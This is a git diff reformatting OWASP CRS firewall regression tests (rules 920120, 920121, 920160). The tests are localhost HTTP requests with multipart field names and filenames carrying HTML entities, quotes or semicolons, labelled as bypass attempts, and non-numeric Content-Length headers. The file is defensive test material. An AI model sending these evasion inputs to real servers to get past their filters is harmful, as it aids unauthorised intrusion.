stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzáéíóúćĺńŕśźǵÁÉÍÓÚĆĹŃŔŚŹ&Gacute;zzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzáéíóúćĺńŕśźǵÁÉÍÓÚĆĹŃŔŚŹ&Gacute;zzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-23 + - test_id: 23 desc: 'Attempted multipart/form-data bypass (920120). 
Negative test for HTML entities at beginning of value: &[aeiouclnrszg]acute;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="áéíóúćĺńŕśźǵÁÉÍÓÚĆĹŃŔŚŹ&Gacute;zzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="áéíóúćĺńŕśźǵÁÉÍÓÚĆĹŃŔŚŹ&Gacute;zzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-24 + - test_id: 24 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[aeiou]grave;.' 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzàèìòùÀÈÌÒÙzzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzàèìòùÀÈÌÒÙzzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-25 + - test_id: 25 desc: 'Attempted multipart/form-data bypass (920120). 
Negative test for HTML entities at beginning of value: &[aeiou]grave;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="àèìòùÀÈÌÒÙzzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="àèìòùÀÈÌÒÙzzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-26 + - test_id: 26 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[cgklnrst]cedil;.' 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzç&gcedil;ķļņŗşţÇĢĶĻŅŖŞŢzzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzç&gcedil;ķļņŗşţÇĢĶĻŅŖŞŢzzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-27 + - test_id: 27 desc: 'Attempted multipart/form-data bypass (920120). 
Negative test for HTML entities at beginning of value: &[cgklnrst]cedil;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="ç&gcedil;ķļņŗşţÇĢĶĻŅŖŞŢzzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="ç&gcedil;ķļņŗşţÇĢĶĻŅŖŞŢzzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-28 + - test_id: 28 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[anoi]tilde;.' 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzãñõĩÃÑÕĨzzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzãñõĩÃÑÕĨzzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-29 + - test_id: 29 desc: 'Attempted multipart/form-data bypass (920120). 
Negative test for HTML entities at beginning of value: &[anoi]tilde;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="ãñõĩÃÑÕĨzzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="ãñõĩÃÑÕĨzzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-30 + - test_id: 30 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[cdelnrstz]caron;.' 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzčďěľňřšťžČĎĚĽŇŘŠŤŽzzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzčďěľňřšťžČĎĚĽŇŘŠŤŽzzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-31 + - test_id: 31 desc: 'Attempted multipart/form-data bypass (920120). 
Negative test for HTML entities at beginning of value: &[cdelnrstz]caron;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="čďěľňřšťžČĎĚĽŇŘŠŤŽzzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="čďěľňřšťžČĎĚĽŇŘŠŤŽzzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-32 + - test_id: 32 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[au]ring;.' 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzåůÅŮzzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzåůÅŮzzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-33 + - test_id: 33 desc: 'Attempted multipart/form-data bypass (920120). 
Negative test for HTML entities at beginning of value: &[au]ring;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="åůÅŮzzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="åůÅŮzzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-34 + - test_id: 34 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: ø,&, ,'.' 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzøØ&& 'zzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzøØ&& 'zzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-35 + - test_id: 35 desc: 'Attempted multipart/form-data bypass (920120). 
Negative test for HTML entities at beginning of value: &[au]ring;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="øØ&& 'zzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="øØ&& 'zzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-36 + - test_id: 36 desc: "Attempted multipart/form-data bypass (920120). Still match ; that aren't part of an HTML entity in FILES." 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="&fi;zzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="&fi;zzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: log_contains: id "920120" - - test_title: 920120-37 + - test_id: 37 desc: "Attempted multipart/form-data bypass (920120). Still match ; that aren't part of an HTML entity in FILES_NAMES." 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="test"; filename="&fi;zzz" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="test"; filename="&fi;zzz" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: log_contains: id "920120" - - test_title: 920120-38 + - test_id: 38 desc: "Attempted multipart/form-data bypass (920120). Don't match ; that are part of HTML entities in both FILES and FILES_NAMES." 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzz&zzz"; filename="zzz&zzz" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzz&zzz"; filename="zzz&zzz" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-39 + - test_id: 39 desc: "Attempted multipart/form-data bypass (920120). Allow empty fields." 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name=""; filename="" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name=""; filename="" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920121.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920121.yaml index cc167e38f..8deb3dc62 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920121.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920121.yaml 
@@ -1,122 +1,116 @@ --- meta: author: "Paul-Beckett, azurit" - enabled: true - name: "920121.yaml" description: "Tests to trigger rule 920121" +rule_id: 920121 tests: - - test_title: 920121-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "multipart/form-data; boundary=--------397236876" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: | - ----------397236876 - Content-Disposition: form-data; name="fileRap"; filename="te;st.txt" - Content-Type: text/plain + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "multipart/form-data; boundary=--------397236876" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: | + ----------397236876 + Content-Disposition: form-data; name="fileRap"; filename="te;st.txt" + Content-Type: text/plain - Some-file-test-here - ----------397236876-- - version: "HTTP/1.1" - output: - log_contains: "id \"920121\"" - - test_title: 920121-2 + Some-file-test-here + ----------397236876-- + version: "HTTP/1.1" + output: + log_contains: "id \"920121\"" + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "multipart/form-data; boundary=--------397236876" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: | - ----------397236876 - Content-Disposition: form-data; name="fileRap"; filename="te'st.txt" - Content-Type: text/plain + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: 
"multipart/form-data; boundary=--------397236876" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: | + ----------397236876 + Content-Disposition: form-data; name="fileRap"; filename="te'st.txt" + Content-Type: text/plain - Some-file-text-here - ----------397236876-- - version: "HTTP/1.1" - output: - log_contains: "id \"920121\"" - - test_title: 920121-3 + Some-file-text-here + ----------397236876-- + version: "HTTP/1.1" + output: + log_contains: "id \"920121\"" + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "multipart/form-data; boundary=--------397236876" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: | - ----------397236876 - Content-Disposition: form-data; name="fileRap"; filename="te\"st.txt" - Content-Type: text/plain + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "multipart/form-data; boundary=--------397236876" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: | + ----------397236876 + Content-Disposition: form-data; name="fileRap"; filename="te\"st.txt" + Content-Type: text/plain - Some-file-text-here - ----------397236876-- - version: "HTTP/1.1" - output: - log_contains: "id \"920121\"" - - test_title: 920121-4 + Some-file-text-here + ----------397236876-- + version: "HTTP/1.1" + output: + log_contains: "id \"920121\"" + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "multipart/form-data; boundary=--------397236876" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: | - ----------397236876 - Content-Disposition: form-data; name="fileRap"; filename="te=st.txt" - Content-Type: text/plain + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "multipart/form-data; boundary=--------397236876" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: | + ----------397236876 + Content-Disposition: form-data; name="fileRap"; filename="te=st.txt" + Content-Type: text/plain - Some-file-text-here - ----------397236876-- - version: "HTTP/1.1" - output: - log_contains: "id \"920121\"" - - test_title: 920121-5 + Some-file-text-here + ----------397236876-- + version: "HTTP/1.1" + output: + log_contains: "id \"920121\"" + - test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "multipart/form-data; boundary=--------397236876" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: | - ----------397236876 - Content-Disposition: form-data; name="fileRap"; filename="test.txt" - Content-Type: text/plain + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "multipart/form-data; boundary=--------397236876" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: | + ----------397236876 + Content-Disposition: form-data; name="fileRap"; filename="test.txt" + Content-Type: text/plain - Characters-shouldn't-trigger-rule-"-match-in-;-file - ----------397236876-- - version: "HTTP/1.1" - output: - no_log_contains: "id 
\"920121\"" + Characters-shouldn't-trigger-rule-"-match-in-;-file + ----------397236876-- + version: "HTTP/1.1" + output: + no_log_contains: "id \"920121\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml index 980d2e7fd..ac93c5db0 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml 
@@ -1,108 +1,102 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920160.yaml" description: "Tests to trigger rule 920160" +rule_id: 920160 tests: - # Non digit Content-Length without content-type - test_title: 920160-1 + test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Length: "NotDigits" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - status: 400 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Length: "NotDigits" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + status: 400 - # Non digit content-length with content-type - test_title: 920160-2 + test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Content-Length: "NotDigits" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - status: 400 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Content-Length: "NotDigits" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + status: 400 - # Mixed digit and non digit content length - test_title: 920160-3 + test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - 
